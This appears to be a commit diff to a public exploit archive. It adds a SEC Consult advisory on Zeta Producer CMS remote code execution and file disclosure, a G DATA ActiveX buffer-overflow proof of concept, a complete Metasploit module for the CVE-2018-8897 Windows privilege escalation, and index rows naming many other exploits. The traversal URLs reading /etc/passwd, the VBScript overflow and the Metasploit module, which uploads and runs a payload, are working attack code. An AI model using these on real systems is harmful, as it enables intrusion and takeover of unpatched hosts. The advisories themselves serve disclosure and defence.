2018-05-08: Status update from VDE CERT
|
||||
2018-05-23: Asking for status update, no news from WAGO (via VDE CERT)
|
||||
2018-06-08: VDE CERT: WAGO fixed the vulnerabilities and firmware is in
|
||||
testing phase
|
||||
2018-06-12: WAGO requested more time, postponing release date, asking for
|
||||
affected & fixed versions
|
||||
2018-06-13: VDE CERT will request CVE numbers
|
||||
2018-06-17: WAGO scheduled the release for 2018-07-11
|
||||
2018-06-26: VDE CERT sends WAGO advisory draft including affected/fixed versions
|
||||
2018-07-04: VDE CERT sends final WAGO advisory incl. CVE numbers
|
||||
2018-07-10: VDE CERT publishes security notice:
|
||||
https://cert.vde.com/de-de/advisories/vde-2018-010
|
||||
2018-07-11: SEC Consult advisory release
|
||||
|
||||
|
||||
Solution:
|
||||
---------
|
||||
Update the device to the latest available firmware (FW 02). For further
|
||||
information see the vendor's security notifications page:
|
||||
|
||||
https://www.wago.com/de/automatisierungstechnik/security (German)
|
||||
|
||||
Direct link to English WAGO advisory:
|
||||
https://www.wago.com/medias/SA-WBM-2018-004.pdf?context=bWFzdGVyfHJvb3R8MjgyNzYwfGFwcGxpY2F0aW9uL3BkZnxoMWUvaDg4LzkzNjE3NTIxOTUxMDIucGRmfDU1NmJkYjEzNDY0ZGU4OWQ1OTMyMjUwNTlmZTI0MzgwNDQ1MDY1YzU3OWRmZDk1NzYzODAwMDI3ODg1NDJlZjU
|
||||
|
||||
|
||||
|
||||
Workaround:
|
||||
-----------
|
||||
Restrict network access to the device, don't allow Internet access from the
|
||||
HMI station and do not install software from untrusted sources.
|
||||
|
||||
|
||||
Advisory URL:
|
||||
-------------
|
||||
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html
|
152
exploits/php/webapps/45016.txt
Normal file
152
exploits/php/webapps/45016.txt
Normal file
|
@ -0,0 +1,152 @@
|
|||
SEC Consult Vulnerability Lab Security Advisory < 20180712-0 >
|
||||
=======================================================================
|
||||
title: Remote Code Execution & Local File Disclosure
|
||||
product: Zeta Producer Desktop CMS
|
||||
vulnerable version: <=14.2.0
|
||||
fixed version: >=14.2.1
|
||||
CVE number: CVE-2018-13981, CVE-2018-13980
|
||||
impact: critical
|
||||
homepage: https://www.zeta-producer.com
|
||||
found: 2017-11-25
|
||||
by: P. Morimoto (Office Bangkok)
|
||||
SEC Consult Vulnerability Lab
|
||||
|
||||
An integrated part of SEC Consult
|
||||
Europe | Asia | North America
|
||||
|
||||
https://www.sec-consult.com
|
||||
|
||||
=======================================================================
|
||||
|
||||
Vendor description:
|
||||
-------------------
|
||||
"With Zeta Producer, the website builder and online shop system for Windows,
|
||||
you can create and manage your website locally, on your computer.
|
||||
Get without expertise in 3 steps to your own homepage: select design,
|
||||
paste content, publish website. Finished."
|
||||
|
||||
Source: https://www.zeta-producer.com/de/index.html
|
||||
|
||||
|
||||
Business recommendation:
|
||||
------------------------
|
||||
The vendor provides a patched version which should be installed immediately.
|
||||
|
||||
Users of the product also need to verify that the affected widgets are updated in
|
||||
the corresponding website project! It could be necessary to rebuild the whole project
|
||||
or copy the new widgets to the website projects. For further information consult the
|
||||
vendor.
|
||||
|
||||
Furthermore, an in-depth security analysis is highly advised, as the software may be
|
||||
affected from further security issues.
|
||||
|
||||
|
||||
Vulnerability overview/description:
|
||||
-----------------------------------
|
||||
1) Remote Code Execution (CVE-2018-13981)
|
||||
The email contact functionality of the widget "formmailer" can upload files
|
||||
to the server but if the user uploads a PHP script with a .php extension
|
||||
then the server will rename it to .phps to prevent PHP code execution.
|
||||
|
||||
However, the attacker can upload .php5 or .phtml to the server without any
|
||||
restriction. These alternative file extensions can be executed as PHP code.
|
||||
|
||||
Furthermore, the server will create a folder to store the files, with a
|
||||
random name using PHP's "uniqid" function.
|
||||
|
||||
Unfortunately, if the server permits directory listing, the attacker
|
||||
can easily browse to the uploaded PHP script. If no directory listing is
|
||||
enabled the attacker can still bruteforce the random name to gain remote
|
||||
code execution via the PHP script as well. Testing on a local server it
|
||||
took about 20 seconds to brute force the random name. This attack will
|
||||
be slower over the Internet but it is still feasible.
|
||||
|
||||
Also, if the user runs the Zeta Producer Desktop CMS GUI client locally,
|
||||
they are also vulnerable because the web server will be running on TCP port 9153.
|
||||
|
||||
The root cause is in the widget "formmailer" which is enabled by default.
|
||||
The following files are affected:
|
||||
- /assets/php/formmailer/SendEmail.php
|
||||
- /assets/php/formmailer/functions.php
|
||||
|
||||
|
||||
2) Local File Disclosure (CVE-2018-13980)
|
||||
If the user enables the widget "filebrowser" on Zeta Producer Desktop CMS an
|
||||
unauthenticated attacker can read local files by exploiting path traversal issues.
|
||||
|
||||
The following files are affected:
|
||||
- /assets/php/filebrowser/filebrowser.main.php
|
||||
|
||||
|
||||
Proof of concept:
|
||||
-----------------
|
||||
1) Remote Code Execution (CVE-2018-13981)
|
||||
The following python script can be used to exploit the chain of vulnerabilities.
|
||||
[.. code has been removed to prevent misuses ..]
|
||||
|
||||
When the script is executed, a PHP script (shell) will be uploaded automatically.
|
||||
# $ python exploit.py
|
||||
# [+] injecting webshell to http://target/assets/php/formmailer/SendEmail.php
|
||||
#
|
||||
# 5a1a5bc991afe
|
||||
# 5a1a5bc99453a
|
||||
# 10812
|
||||
# [*] Found : http://target/assets/php/formmailer/upload_5a1a5bc992772/sectest.php5
|
||||
# uid=33(www-data) gid=33(www-data) groups=33(www-data)
|
||||
|
||||
|
||||
2) Local File Disclosure (CVE-2018-13980)
|
||||
The parameter "file" in the "filebrowser.main.php" script can be exploited to read
|
||||
arbitrary files from the OS with the privileges of the web server user.
|
||||
Any unauthenticated user can exploit this issue!
|
||||
|
||||
http://target/assets/php/filebrowser/filebrowser.main.php?file=../../../../../../../../../../etc/passwd&do=download
|
||||
http://target/assets/php/filebrowser/filebrowser.main.php?file=../../../../../../../../../../etc&do=list
|
||||
|
||||
|
||||
Vulnerable / tested versions:
|
||||
-----------------------------
|
||||
The following versions have been tested which were the latest version available
|
||||
at the time of the test:
|
||||
|
||||
Zeta Producer Desktop CMS 14.1.0
|
||||
Zeta Producer Desktop CMS 14.2.0
|
||||
|
||||
Source:
|
||||
- https://www.zeta-producer.com/de/download.html
|
||||
- https://github.com/ZetaSoftware/zeta-producer-content/
|
||||
|
||||
|
||||
Vendor contact timeline:
|
||||
------------------------
|
||||
2017-11-29: Contacting vendor through info@zeta-producer.com and various other
|
||||
email addresses from the website. No reply.
|
||||
2017-12-13: Contacting vendor again, extending email address list, no reply
|
||||
2018-01-09: Contacting vendor again
|
||||
2018-01-10: Vendor replies, requests transmission of security advisory
|
||||
2018-01-10: Sending unencrypted security advisory
|
||||
2018-07-02: There was no feedback from the vendor but the version 14.2.1 fixed
|
||||
the reported vulnerabilities.
|
||||
2018-07-12: Public advisory release.
|
||||
|
||||
|
||||
Solution:
|
||||
---------
|
||||
Upgrade to version 14.2.1 or newer. See the vendor's download page:
|
||||
|
||||
https://www.zeta-producer.com/de/download.html
|
||||
|
||||
Users of the product also need to verify that the affected widgets are updated in
|
||||
the corresponding website project! It could be necessary to rebuild the whole project
|
||||
or copy the new widgets to the website projects. For further information consult the
|
||||
vendor.
|
||||
|
||||
|
||||
Workaround:
|
||||
-----------
|
||||
Remove "formmailer" and "filebrowser" widgets.
|
||||
|
||||
|
||||
Advisory URL:
|
||||
-------------
|
||||
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html
|
73
exploits/windows/dos/45017.html
Normal file
73
exploits/windows/dos/45017.html
Normal file
|
@ -0,0 +1,73 @@
|
|||
<!--
|
||||
=====[ Tempest Security Intelligence - ADV-24/2018 ]===
|
||||
|
||||
G DATA TOTAL SECURITY v25.4.0.3 Activex Buffer Overflow
|
||||
Author: Filipe Xavier Oliveira
|
||||
Tempest Security Intelligence - Recife, Pernambuco - Brazil
|
||||
|
||||
=====[ Table of Contents]=====================================================
|
||||
|
||||
* Overview
|
||||
* Detailed description
|
||||
* Timeline of disclosure
|
||||
* Thanks & Acknowledgements
|
||||
* References
|
||||
|
||||
=====[ Overview]==============================================================
|
||||
|
||||
* System affected : G DATA TOTAL SECURITY [1].
|
||||
* Software Version : 25.4.0.3 (other versions may also be affected).
|
||||
* Impact : A user may be affected by opening a malicious black list
|
||||
email in the antispam filter,
|
||||
|
||||
=====[ Detailed description]==================================================
|
||||
The GDASPAMLib.AntiSpam ActiveX control ASK\GDASpam.dll in G DATA Total
|
||||
Security 25.4.0.3 has a buffer overflow via a long IsBlackListed argument.
|
||||
Through a long input in a member of class called Antispam, isblackedlist
|
||||
class is vulnerable a buffer overflow.
|
||||
|
||||
A poc that causes a buffer overflow :
|
||||
-->
|
||||
|
||||
<?XML version='1.0' standalone='yes' ?>
|
||||
<package><job id='DoneInVBS' debug='false' error='true'>
|
||||
<object classid='clsid:B9D1548D-4339-485A-ABA2-F9F9C1CBF8AC' id='target' />
|
||||
<script language='vbscript'>
|
||||
|
||||
|
||||
'for debugging/custom prolog
|
||||
targetFile = "C:\Program Files\G DATA\TotalSecurity\ASK\GDASpam.dll"
|
||||
prototype = "Function IsBlackListed ( ByVal strIP As String ) As Long"
|
||||
memberName = "IsBlackListed"
|
||||
progid = "GDASPAMLib.AntiSpam"
|
||||
argCount = 1
|
||||
|
||||
arg1=String(14356, "A")
|
||||
|
||||
target.IsBlackListed arg1
|
||||
|
||||
</script></job></package>
|
||||
|
||||
<!--
|
||||
=====[ Timeline of disclosure]===============================================
|
||||
|
||||
04/10/2018 - Vulnerability reported.
|
||||
04/17/2018 - The vendor will fix the vulnerability.
|
||||
05/24/2017 - Vulnerability fixed.
|
||||
|
||||
07/12/2018 - CVE assigned [1]
|
||||
|
||||
=====[ Thanks & Acknowledgements]============================================
|
||||
|
||||
- Tempest Security Intelligence / Tempest's Pentest Team [3]
|
||||
|
||||
=====[ References]===========================================================
|
||||
|
||||
[1] https://www.gdatasoftware.com/
|
||||
|
||||
[2] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10018
|
||||
|
||||
[3] http://www.tempest.com.br
|
||||
|
||||
=====[ EOF]====================================================================
|
||||
-->
|
174
exploits/windows/local/45024.rb
Executable file
174
exploits/windows/local/45024.rb
Executable file
|
@ -0,0 +1,174 @@
|
|||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core/post/common'
|
||||
require 'msf/core/post/file'
|
||||
require 'msf/core/post/windows/priv'
|
||||
require 'msf/core/post/windows/registry'
|
||||
require 'msf/core/exploit/exe'
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Local
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Post::Common
|
||||
include Msf::Post::File
|
||||
include Msf::Post::Windows::Priv
|
||||
include Msf::Exploit::EXE
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability',
|
||||
'Description' => %q{
|
||||
This module exploits a vulnerability in a statement in the system programming guide
|
||||
of the Intel 64 and IA-32 architectures software developer's manual being mishandled
|
||||
in various operating system kerneles, resulting in unexpected behavior for #DB
|
||||
excpetions that are deferred by MOV SS or POP SS.
|
||||
|
||||
This module will upload the pre-compiled exploit and use it to execute the final
|
||||
payload in order to gain remote code execution.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'Nick Peterson', # Original discovery (@nickeverdox)
|
||||
'Nemanja Mulasmajic', # Original discovery (@0xNemi)
|
||||
'Can Bölük <can1357>', # PoC
|
||||
'bwatters-r7' # msf module
|
||||
],
|
||||
'Platform' => [ 'win' ],
|
||||
'SessionTypes' => [ 'meterpreter' ],
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Windows x64', { 'Arch' => ARCH_X64 } ]
|
||||
],
|
||||
'DefaultTarget' => 0,
|
||||
'DisclosureDate' => 'May 08 2018',
|
||||
'References' =>
|
||||
[
|
||||
['CVE', '2018-8897'],
|
||||
['EDB', '44697'],
|
||||
['BID', '104071'],
|
||||
['URL', 'https://github.com/can1357/CVE-2018-8897/'],
|
||||
['URL', 'https://blog.can.ac/2018/05/11/arbitrary-code-execution-at-ring-0-using-cve-2018-8897/']
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'DisablePayloadHandler' => 'False'
|
||||
}
|
||||
))
|
||||
|
||||
register_options([
|
||||
OptString.new('EXPLOIT_NAME',
|
||||
[false, 'The filename to use for the exploit binary (%RAND% by default).', nil]),
|
||||
OptString.new('PAYLOAD_NAME',
|
||||
[false, 'The filename for the payload to be used on the target host (%RAND%.exe by default).', nil]),
|
||||
OptString.new('PATH',
|
||||
[false, 'Path to write binaries (%TEMP% by default).', nil]),
|
||||
OptInt.new('EXECUTE_DELAY',
|
||||
[false, 'The number of seconds to delay before executing the exploit', 3])
|
||||
])
|
||||
end
|
||||
|
||||
def setup
|
||||
super
|
||||
@exploit_name = datastore['EXPLOIT_NAME'] || Rex::Text.rand_text_alpha((rand(8)+6))
|
||||
@payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha((rand(8)+6))
|
||||
@exploit_name = "#{exploit_name}.exe" unless exploit_name.match(/\.exe$/i)
|
||||
@payload_name = "#{payload_name}.exe" unless payload_name.match(/\.exe$/i)
|
||||
@temp_path = datastore['PATH'] || session.sys.config.getenv('TEMP')
|
||||
@payload_path = "#{temp_path}\\#{payload_name}"
|
||||
@exploit_path = "#{temp_path}\\#{exploit_name}"
|
||||
@payload_exe = generate_payload_exe
|
||||
end
|
||||
|
||||
def validate_active_host
|
||||
begin
|
||||
host = session.session_host
|
||||
print_status("Attempting to PrivEsc on #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}")
|
||||
rescue Rex::Post::Meterpreter::RequestError => e
|
||||
elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
|
||||
raise Msf::Exploit::Failed, 'Could not connect to session'
|
||||
end
|
||||
end
|
||||
|
||||
def validate_remote_path(path)
|
||||
unless directory?(path)
|
||||
fail_with(Failure::Unreachable, "#{path} does not exist on the target")
|
||||
end
|
||||
end
|
||||
|
||||
def validate_target
|
||||
if sysinfo['Architecture'] == ARCH_X86
|
||||
fail_with(Failure::NoTarget, 'Exploit code is 64-bit only')
|
||||
end
|
||||
if sysinfo['OS'] =~ /XP/
|
||||
fail_with(Failure::Unknown, 'The exploit binary does not support Windows XP')
|
||||
end
|
||||
end
|
||||
|
||||
def ensure_clean_destination(path)
|
||||
if file?(path)
|
||||
print_status("#{path} already exists on the target. Deleting...")
|
||||
begin
|
||||
file_rm(path)
|
||||
print_status("Deleted #{path}")
|
||||
rescue Rex::Post::Meterpreter::RequestError => e
|
||||
elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
|
||||
print_error("Unable to delete #{path}")
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
def ensure_clean_exploit_destination
|
||||
ensure_clean_destination(exploit_path)
|
||||
end
|
||||
|
||||
def ensure_clean_payload_destination
|
||||
ensure_clean_destination(payload_path)
|
||||
end
|
||||
|
||||
def upload_exploit
|
||||
local_exploit_path = ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2018-8897-exe', 'cve-2018-8897-exe.exe')
|
||||
upload_file(exploit_path, local_exploit_path)
|
||||
print_status("Exploit uploaded on #{sysinfo['Computer']} to #{exploit_path}")
|
||||
end
|
||||
|
||||
def upload_payload
|
||||
write_file(payload_path, payload_exe)
|
||||
print_status("Payload (#{payload_exe.length} bytes) uploaded on #{sysinfo['Computer']} to #{payload_path}")
|
||||
end
|
||||
|
||||
def execute_exploit
|
||||
sleep(datastore['EXECUTE_DELAY'])
|
||||
print_status("Running exploit #{exploit_path} with payload #{payload_path}")
|
||||
output = cmd_exec('cmd.exe', "/c #{exploit_path} #{payload_path}")
|
||||
vprint_status(output)
|
||||
end
|
||||
|
||||
def exploit
|
||||
begin
|
||||
validate_active_host
|
||||
validate_target
|
||||
validate_remote_path(temp_path)
|
||||
ensure_clean_exploit_destination
|
||||
ensure_clean_payload_destination
|
||||
upload_exploit
|
||||
upload_payload
|
||||
execute_exploit
|
||||
rescue Rex::Post::Meterpreter::RequestError => e
|
||||
elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
|
||||
print_error(e.message)
|
||||
ensure_clean_exploit_destination
|
||||
ensure_clean_payload_destination
|
||||
end
|
||||
end
|
||||
|
||||
attr_reader :exploit_name
|
||||
attr_reader :payload_name
|
||||
attr_reader :payload_exe
|
||||
attr_reader :temp_path
|
||||
attr_reader :payload_path
|
||||
attr_reader :exploit_path
|
||||
end
|
|
@ -6016,6 +6016,7 @@ id,file,description,date,author,type,platform,port
|
|||
45011,exploits/windows/dos/45011.js,"Microsoft Edge Chakra JIT - Out-of-Bounds Reads/Writes",2018-07-12,"Google Security Research",dos,windows,
|
||||
45012,exploits/windows/dos/45012.js,"Microsoft Edge Chakra JIT - BoundFunction::NewInstance Out-of-Bounds Read",2018-07-12,"Google Security Research",dos,windows,
|
||||
45013,exploits/windows/dos/45013.js,"Microsoft Edge Chakra JIT - Type Confusion with Hoisted SetConcatStrMultiItemBE Instructions",2018-07-12,"Google Security Research",dos,windows,
|
||||
45017,exploits/windows/dos/45017.html,"G DATA Total Security 25.4.0.3 - Activex Buffer Overflow",2018-07-13,"Filipe Xavier Oliveira",dos,windows,
|
||||
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
|
||||
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
|
||||
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
|
||||
|
@ -9812,6 +9813,7 @@ id,file,description,date,author,type,platform,port
|
|||
44984,exploits/hardware/local/44984.txt,"ADB Broadband Gateways / Routers - Privilege Escalation",2018-07-05,"SEC Consult",local,hardware,
|
||||
44989,exploits/windows/local/44989.py,"Boxoft WAV to WMA Converter 1.0 - Local Buffer Overflow (SEH)",2018-07-09,Achilles,local,windows,
|
||||
45010,exploits/linux/local/45010.c,"Linux Kernel < 4.13.9 (Ubuntu 16.04/Fedora 27) - Local Privilege Escalation",2018-07-10,rlarabee,local,linux,
|
||||
45024,exploits/windows/local/45024.rb,"Microsoft Windows - POP/MOV SS Local Privilege Elevation (Metasploit)",2018-07-13,Metasploit,local,windows,
|
||||
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
|
||||
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
|
||||
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
|
||||
|
@ -16608,11 +16610,15 @@ id,file,description,date,author,type,platform,port
|
|||
44985,exploits/windows/remote/44985.c,"PolarisOffice 2017 8 - Remote Code Execution",2018-07-06,hyp3rlinx,remote,windows,
|
||||
44987,exploits/windows/remote/44987.txt,"Activision Infinity Ward Call of Duty Modern Warfare 2 - Buffer Overflow",2018-07-09,"Maurice Heumann",remote,windows,
|
||||
44991,exploits/linux/remote/44991.rb,"HP VAN SDN Controller - Root Command Injection (Metasploit)",2018-07-09,Metasploit,remote,linux,8081
|
||||
44992,exploits/linux/remote/44992.rb,"HID discoveryd - 'command_blink_on' Unauthenticated Remote Code Execution (Metasploit)",2018-07-09,Metasploit,remote,linux,4070
|
||||
44992,exploits/linux/remote/44992.rb,"HID discoveryd - 'command_blink_on' Remote Code Execution (Metasploit)",2018-07-09,Metasploit,remote,linux,4070
|
||||
44993,exploits/php/remote/44993.rb,"GitList 0.6.0 - Argument Injection (Metasploit)",2018-07-09,Metasploit,remote,php,
|
||||
45000,exploits/linux_x86-64/remote/45000.c,"OpenSSH < 6.6 SFTP (x64) - Command Execution",2014-10-08,"Jann Horn",remote,linux_x86-64,
|
||||
45001,exploits/linux/remote/45001.py,"OpenSSH < 6.6 SFTP - Command Execution",2018-03-20,SECFORCE,remote,linux,
|
||||
45005,exploits/unix/remote/45005.rb,"IBM QRadar SIEM - Unauthenticated Remote Code Execution (Metasploit)",2018-07-11,Metasploit,remote,unix,443
|
||||
45005,exploits/unix/remote/45005.rb,"IBM QRadar SIEM - Remote Code Execution (Metasploit)",2018-07-11,Metasploit,remote,unix,443
|
||||
45018,exploits/java/remote/45018.rb,"Manage Engine Exchange Reporter Plus - Remote Code Execution (Metasploit)",2018-07-13,Metasploit,remote,java,8181
|
||||
45019,exploits/linux/remote/45019.rb,"Apache CouchDB - Arbitrary Command Execution (Metasploit)",2018-07-13,Metasploit,remote,linux,5984
|
||||
45020,exploits/php/remote/45020.rb,"phpMyAdmin - (Authenticated) Remote Code Execution (Metasploit)",2018-07-13,Metasploit,remote,php,80
|
||||
45025,exploits/linux/remote/45025.rb,"Hadoop YARN ResourceManager - Unauthenticated Command Execution (Metasploit)",2018-07-13,Metasploit,remote,linux,8088
|
||||
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
|
||||
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
|
||||
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
|
||||
|
@ -26049,7 +26055,7 @@ id,file,description,date,author,type,platform,port
|
|||
18468,exploits/php/webapps/18468.html,"Flyspray 0.9.9.6 - Cross-Site Request Forgery",2012-02-07,"Vaibhav Gupta",webapps,php,
|
||||
18470,exploits/php/webapps/18470.txt,"Gazelle CMS 1.0 - Update Statement SQL Injection",2012-02-08,hackme,webapps,php,
|
||||
18473,exploits/multiple/webapps/18473.txt,"Cyberoam Central Console 2.00.2 - Remote File Inclusion",2012-02-08,Vulnerability-Lab,webapps,multiple,
|
||||
18480,exploits/php/webapps/18480.txt,"Dolibarr 3.2.0 < Alpha - File Inclusion",2012-02-10,Vulnerability-Lab,webapps,php,
|
||||
18480,exploits/php/webapps/18480.txt,"Dolibarr ERP/CRM 3.2.0 < Alpha - File Inclusion",2012-02-10,Vulnerability-Lab,webapps,php,
|
||||
18483,exploits/php/webapps/18483.txt,"Fork CMS 3.2.4 - Local File Inclusion / Cross-Site Scripting",2012-02-12,"Avram Marius",webapps,php,
|
||||
18499,exploits/hardware/webapps/18499.txt,"D-Link DSL-2640B ADSL Router - Cross-Site Request Forgery",2012-02-20,"Ivano Binetti",webapps,hardware,
|
||||
18487,exploits/php/webapps/18487.html,"SocialCMS 1.0.2 - Cross-Site Request Forgery",2012-02-16,"Ivano Binetti",webapps,php,
|
||||
|
@ -26149,7 +26155,7 @@ id,file,description,date,author,type,platform,port
|
|||
18720,exploits/php/webapps/18720.txt,"Utopia News Pro 1.4.0 - Cross-Site Request Forgery (Add Admin)",2012-04-08,Dr.NaNo,webapps,php,
|
||||
18722,exploits/cgi/webapps/18722.txt,"ZTE - Change Admin Password",2012-04-08,"Nuevo Asesino",webapps,cgi,
|
||||
18724,exploits/php/webapps/18724.rb,"Dolibarr ERP/CRM 3 - (Authenticated) OS Command Injection (Metasploit)",2012-04-09,Metasploit,webapps,php,
|
||||
18725,exploits/php/webapps/18725.txt,"Dolibarr ERP/CRM - OS Command Injection",2012-04-09,"Nahuel Grisolia",webapps,php,
|
||||
18725,exploits/php/webapps/18725.txt,"Dolibarr ERP/CRM < 3.2.0 / < 3.1.1 - OS Command Injection",2012-04-09,"Nahuel Grisolia",webapps,php,
|
||||
18728,exploits/php/webapps/18728.txt,"Joomla! Component Estate Agent - SQL Injection",2012-04-10,xDarkSton3x,webapps,php,
|
||||
18729,exploits/php/webapps/18729.txt,"Joomla! Component com_bearleague - SQL Injection",2012-04-10,xDarkSton3x,webapps,php,
|
||||
18732,exploits/php/webapps/18732.txt,"SoftwareDEP Classified Script 2.5 - SQL Injection (2)",2012-04-12,"hordcode security",webapps,php,
|
||||
|
@ -30956,7 +30962,7 @@ id,file,description,date,author,type,platform,port
|
|||
28965,exploits/php/webapps/28965.txt,"Bitweaver 1.x - '/wiki/list_pages.php?sort_mode' SQL Injection",2006-11-10,"laurent gaffie",webapps,php,
|
||||
28967,exploits/php/webapps/28967.txt,"ExoPHPDesk 1.2 - 'Pipe.php' Remote File Inclusion",2006-11-11,Firewall1954,webapps,php,
|
||||
28970,exploits/php/webapps/28970.txt,"WordPress Plugin Dexs PM System - (Authenticated) Persistent Cross-Site Scripting",2013-10-15,TheXero,webapps,php,80
|
||||
28971,exploits/php/webapps/28971.py,"Dolibarr ERP/CMS 3.4.0 - 'exportcsv.php?sondage' SQL Injection",2013-10-15,drone,webapps,php,80
|
||||
28971,exploits/php/webapps/28971.py,"Dolibarr ERP/CRM 3.4.0 - 'exportcsv.php?sondage' SQL Injection",2013-10-15,drone,webapps,php,80
|
||||
28972,exploits/unix/webapps/28972.rb,"Zabbix 2.0.8 - SQL Injection / Remote Code Execution (Metasploit)",2013-10-15,"Jason Kratzer",webapps,unix,
|
||||
28975,exploits/ios/webapps/28975.txt,"My File Explorer 1.3.1 iOS - Multiple Web Vulnerabilities",2013-10-15,Vulnerability-Lab,webapps,ios,
|
||||
28976,exploits/ios/webapps/28976.txt,"OliveOffice Mobile Suite 2.0.3 iOS - Local File Inclusion",2013-10-15,Vulnerability-Lab,webapps,ios,
|
||||
|
@ -34015,7 +34021,7 @@ id,file,description,date,author,type,platform,port
|
|||
34004,exploits/php/webapps/34004.txt,"Joomla! Component Percha Fields Attach 1.0 - 'Controller' Traversal Arbitrary File Access",2010-05-19,AntiSecurity,webapps,php,
|
||||
34005,exploits/php/webapps/34005.txt,"Joomla! Component Percha Downloads Attach 1.1 - 'Controller' Traversal Arbitrary File Access",2010-05-19,AntiSecurity,webapps,php,
|
||||
34006,exploits/php/webapps/34006.txt,"Joomla! Component Percha Gallery 1.6 Beta - 'Controller' Traversal Arbitrary File Access",2010-05-19,AntiSecurity,webapps,php,
|
||||
34007,exploits/php/webapps/34007.txt,"Dolibarr CMS 3.5.3 - Multiple Vulnerabilities",2014-07-08,"Deepak Rathore",webapps,php,
|
||||
34007,exploits/php/webapps/34007.txt,"Dolibarr ERP/CRM 3.5.3 - Multiple Vulnerabilities",2014-07-08,"Deepak Rathore",webapps,php,
|
||||
34008,exploits/php/webapps/34008.txt,"Joomla! Component Percha Multicategory Article 0.6 - 'Controller' Arbitrary File Access",2010-05-19,AntiSecurity,webapps,php,
|
||||
34011,exploits/php/webapps/34011.txt,"Shopzilla Affiliate Script PHP - 'search.php' Cross-Site Scripting",2010-05-19,"Andrea Bocchetti",webapps,php,
|
||||
34012,exploits/php/webapps/34012.txt,"Caucho Resin Professional 3.1.5 - '/resin-admin/digest.php' Multiple Cross-Site Scripting Vulnerabilities",2010-05-19,xuanmumu,webapps,php,
|
||||
|
@ -35052,7 +35058,7 @@ id,file,description,date,author,type,platform,port
|
|||
35648,exploits/php/webapps/35648.txt,"ZenPhoto 1.4.0.3 - '_zp_themeroot' Multiple Cross-Site Scripting Vulnerabilities",2011-04-21,"High-Tech Bridge SA",webapps,php,
|
||||
35649,exploits/php/webapps/35649.txt,"todoyu 2.0.8 - 'lang' Cross-Site Scripting",2011-04-22,"AutoSec Tools",webapps,php,
|
||||
35650,exploits/php/webapps/35650.py,"LightNEasy 3.2.3 - 'userhandle' Cookie SQL Injection",2011-04-21,"AutoSec Tools",webapps,php,
|
||||
35651,exploits/php/webapps/35651.txt,"Dolibarr CMS 3.0 - Local File Inclusion / Cross-Site Scripting",2011-04-22,"AutoSec Tools",webapps,php,
|
||||
35651,exploits/php/webapps/35651.txt,"Dolibarr ERP/CRM 3.0 - Local File Inclusion / Cross-Site Scripting",2011-04-22,"AutoSec Tools",webapps,php,
|
||||
35657,exploits/php/webapps/35657.php,"WordPress Plugin Sermon Browser 0.43 - Cross-Site Scripting / SQL Injection",2011-04-26,Ma3sTr0-Dz,webapps,php,
|
||||
35655,exploits/php/webapps/35655.txt,"TemaTres 1.3 - '_search_expresion' Cross-Site Scripting",2011-04-25,"AutoSec Tools",webapps,php,
|
||||
35662,exploits/php/webapps/35662.txt,"Noah's Classifieds 5.0.4 - 'index.php' Multiple HTML Injection Vulnerabilities",2011-04-26,"High-Tech Bridge SA",webapps,php,
|
||||
|
@ -35476,9 +35482,9 @@ id,file,description,date,author,type,platform,port
|
|||
36328,exploits/php/webapps/36328.txt,"TA.CMS (TeachArabia) - 'index.php?id' SQL Injection",2011-11-22,CoBRa_21,webapps,php,
|
||||
36329,exploits/php/webapps/36329.txt,"TA.CMS (TeachArabia) - 'lang' Traversal Local File Inclusion",2011-11-22,CoBRa_21,webapps,php,
|
||||
36330,exploits/php/webapps/36330.txt,"Dolibarr ERP/CRM 3.1 - Multiple Script URI Cross-Site Scripting Vulnerabilities",2011-11-23,"High-Tech Bridge SA",webapps,php,
|
||||
36331,exploits/php/webapps/36331.txt,"Dolibarr ERP/CRM - '/user/index.php' Multiple SQL Injections",2011-11-23,"High-Tech Bridge SA",webapps,php,
|
||||
36332,exploits/php/webapps/36332.txt,"Dolibarr ERP/CRM - '/user/info.php?id' SQL Injection",2011-11-23,"High-Tech Bridge SA",webapps,php,
|
||||
36333,exploits/php/webapps/36333.txt,"Dolibarr ERP/CRM - '/admin/boxes.php?rowid' SQL Injection",2011-11-23,"High-Tech Bridge SA",webapps,php,
|
||||
